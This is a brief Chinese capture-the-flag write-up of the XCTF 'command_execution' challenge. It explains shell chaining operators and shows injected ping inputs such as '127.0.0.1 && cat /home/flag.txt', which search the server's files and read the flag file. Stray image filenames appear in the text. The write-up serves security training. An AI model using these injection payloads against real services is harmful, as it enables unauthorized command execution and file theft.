入门 - command_execution - 《XCTF-攻防世界WP》

作者：leena，转载请注明来源SourceCode战队

题目信息

小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的，你知道为什么吗。

考察命令执行中一些危险符号以及过滤不严。
A&B，前面的语句为假则直接执行后面的
A &&B A为真才执行B
A|B A的结果作为B的参数
A||B A为假才执行B

127.0.0.1 && find / -name “*.txt”

${D}WSEED`0SL_YO5P{GNONP.png$
打开flag.txt 文件
127.0.0.1 && cat /home/flag.txt
拿到flag
A8IOWQ0MVA$V{O1JS59YD%7.png